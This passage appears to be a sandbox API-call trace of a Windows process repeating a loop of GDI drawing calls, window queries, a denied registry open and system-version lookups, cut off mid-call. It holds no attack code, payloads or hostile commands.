[0017.755] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.755] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.755] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.755] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.755] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c040713 [0017.755] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1204027d [0017.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0c [0017.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0d [0017.755] CombineRgn (hrgnDst=0x1040d0c, hrgnSrc1=0x1c040713, hrgnSrc2=0x1204027d, iMode=1) returned 1 [0017.755] CombineRgn (hrgnDst=0x1040d0d, hrgnSrc1=0x1c040713, hrgnSrc2=0x1204027d, iMode=4) returned 2 [0017.755] CreateSolidBrush (color=0xff) returned 0x2100d0b [0017.755] CreateSolidBrush (color=0xff0000) returned 0x1100d0e [0017.755] DeleteObject (ho=0x1100d0e) returned 1 [0017.755] DeleteObject (ho=0x1204027d) returned 1 [0017.755] DeleteObject (ho=0x1c040713) returned 1 [0017.755] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.755] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.755] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.755] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.755] BeginPath (hdc=0x0) returned 0 [0017.755] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.755] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.756] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.756] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.756] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1304027d [0017.756] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d040713 [0017.756] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0f [0017.756] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d10 [0017.756] CombineRgn (hrgnDst=0x1040d0f, hrgnSrc1=0x1304027d, hrgnSrc2=0x1d040713, iMode=1) returned 1 [0017.756] CombineRgn (hrgnDst=0x1040d10, hrgnSrc1=0x1304027d, hrgnSrc2=0x1d040713, iMode=4) returned 2 [0017.756] CreateSolidBrush (color=0xff) returned 0x2100d0e [0017.756] CreateSolidBrush (color=0xff0000) returned 0x1100d11 [0017.756] DeleteObject (ho=0x1100d11) returned 1 [0017.756] DeleteObject (ho=0x1d040713) returned 1 [0017.756] DeleteObject (ho=0x1304027d) returned 1 [0017.756] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.756] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.756] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.756] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.756] BeginPath (hdc=0x0) returned 0 [0017.756] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.756] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.756] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.757] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.757] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e040713 [0017.757] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1404027d [0017.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d12 [0017.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d13 [0017.757] CombineRgn (hrgnDst=0x1040d12, hrgnSrc1=0x1e040713, hrgnSrc2=0x1404027d, iMode=1) returned 1 [0017.757] CombineRgn (hrgnDst=0x1040d13, hrgnSrc1=0x1e040713, hrgnSrc2=0x1404027d, iMode=4) returned 2 [0017.757] CreateSolidBrush (color=0xff) returned 0x2100d11 [0017.757] CreateSolidBrush (color=0xff0000) returned 0x1100d14 [0017.757] DeleteObject (ho=0x1100d14) returned 1 [0017.757] DeleteObject (ho=0x1404027d) returned 1 [0017.757] DeleteObject (ho=0x1e040713) returned 1 [0017.757] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.757] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.757] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.757] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.757] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.757] BeginPath (hdc=0x0) returned 0 [0017.757] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.757] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.757] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.757] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.757] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.757] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.757] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.758] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1504027d [0017.758] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f040713 [0017.758] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d15 [0017.758] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d16 [0017.758] CombineRgn (hrgnDst=0x1040d15, hrgnSrc1=0x1504027d, hrgnSrc2=0x1f040713, iMode=1) returned 1 [0017.758] CombineRgn (hrgnDst=0x1040d16, hrgnSrc1=0x1504027d, hrgnSrc2=0x1f040713, iMode=4) returned 2 [0017.758] CreateSolidBrush (color=0xff) returned 0x2100d14 [0017.758] CreateSolidBrush (color=0xff0000) returned 0x1100d17 [0017.758] DeleteObject (ho=0x1100d17) returned 1 [0017.758] DeleteObject (ho=0x1f040713) returned 1 [0017.758] DeleteObject (ho=0x1504027d) returned 1 [0017.758] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.758] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.758] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.758] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.758] BeginPath (hdc=0x0) returned 0 [0017.758] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.758] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.758] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.758] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.759] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20040713 [0017.759] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1604027d [0017.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d18 [0017.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d19 [0017.759] CombineRgn (hrgnDst=0x1040d18, hrgnSrc1=0x20040713, hrgnSrc2=0x1604027d, iMode=1) returned 1 [0017.759] CombineRgn (hrgnDst=0x1040d19, hrgnSrc1=0x20040713, hrgnSrc2=0x1604027d, iMode=4) returned 2 [0017.759] CreateSolidBrush (color=0xff) returned 0x2100d17 [0017.759] CreateSolidBrush (color=0xff0000) returned 0x1100d1a [0017.759] DeleteObject (ho=0x1100d1a) returned 1 [0017.759] DeleteObject (ho=0x1604027d) returned 1 [0017.759] DeleteObject (ho=0x20040713) returned 1 [0017.759] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.759] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.759] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.759] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.759] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.759] BeginPath (hdc=0x0) returned 0 [0017.759] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.759] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.759] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.759] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.759] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.759] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.759] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.759] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.759] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1704027d [0017.759] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x21040713 [0017.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1b [0017.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1c [0017.760] CombineRgn (hrgnDst=0x1040d1b, hrgnSrc1=0x1704027d, hrgnSrc2=0x21040713, iMode=1) returned 1 [0017.760] CombineRgn (hrgnDst=0x1040d1c, hrgnSrc1=0x1704027d, hrgnSrc2=0x21040713, iMode=4) returned 2 [0017.760] CreateSolidBrush (color=0xff) returned 0x2100d1a [0017.760] CreateSolidBrush (color=0xff0000) returned 0x1100d1d [0017.760] DeleteObject (ho=0x1100d1d) returned 1 [0017.760] DeleteObject (ho=0x21040713) returned 1 [0017.760] DeleteObject (ho=0x1704027d) returned 1 [0017.760] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.760] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.760] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.760] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.760] BeginPath (hdc=0x0) returned 0 [0017.760] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.760] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.760] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.760] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.760] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x22040713 [0017.760] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1804027d [0017.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1e [0017.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d1f [0017.760] CombineRgn (hrgnDst=0x1040d1e, hrgnSrc1=0x22040713, hrgnSrc2=0x1804027d, iMode=1) returned 1 [0017.761] CombineRgn (hrgnDst=0x1040d1f, hrgnSrc1=0x22040713, hrgnSrc2=0x1804027d, iMode=4) returned 2 [0017.761] CreateSolidBrush (color=0xff) returned 0x2100d1d [0017.761] CreateSolidBrush (color=0xff0000) returned 0x1100d20 [0017.761] DeleteObject (ho=0x1100d20) returned 1 [0017.761] DeleteObject (ho=0x1804027d) returned 1 [0017.761] DeleteObject (ho=0x22040713) returned 1 [0017.761] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.761] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.761] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.761] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.761] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.761] BeginPath (hdc=0x0) returned 0 [0017.761] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.761] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.761] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.761] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.761] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.761] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.761] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.761] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.761] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1904027d [0017.761] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x23040713 [0017.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d21 [0017.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d22 [0017.761] CombineRgn (hrgnDst=0x1040d21, hrgnSrc1=0x1904027d, hrgnSrc2=0x23040713, iMode=1) returned 1 [0017.761] CombineRgn (hrgnDst=0x1040d22, hrgnSrc1=0x1904027d, hrgnSrc2=0x23040713, iMode=4) returned 2 [0017.761] CreateSolidBrush (color=0xff) returned 0x2100d20 [0017.761] CreateSolidBrush (color=0xff0000) returned 0x1100d23 [0017.762] DeleteObject (ho=0x1100d23) returned 1 [0017.762] DeleteObject (ho=0x23040713) returned 1 [0017.762] DeleteObject (ho=0x1904027d) returned 1 [0017.762] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.762] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.762] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.762] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.762] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.762] BeginPath (hdc=0x0) returned 0 [0017.762] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.762] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.762] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.762] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.762] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.762] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x24040713 [0017.762] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a04027d [0017.762] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d24 [0017.762] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d25 [0017.762] CombineRgn (hrgnDst=0x1040d24, hrgnSrc1=0x24040713, hrgnSrc2=0x1a04027d, iMode=1) returned 1 [0017.762] CombineRgn (hrgnDst=0x1040d25, hrgnSrc1=0x24040713, hrgnSrc2=0x1a04027d, iMode=4) returned 2 [0017.762] CreateSolidBrush (color=0xff) returned 0x2100d23 [0017.762] CreateSolidBrush (color=0xff0000) returned 0x1100d26 [0017.762] DeleteObject (ho=0x1100d26) returned 1 [0017.762] DeleteObject (ho=0x1a04027d) returned 1 [0017.762] DeleteObject (ho=0x24040713) returned 1 [0017.763] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.763] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.763] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.763] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.763] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.763] BeginPath (hdc=0x0) returned 0 [0017.763] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.763] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.763] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.763] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.763] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.763] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.763] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.763] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.763] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b04027d [0017.763] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x25040713 [0017.763] CreateRectRgn (x1=0, y1=0, 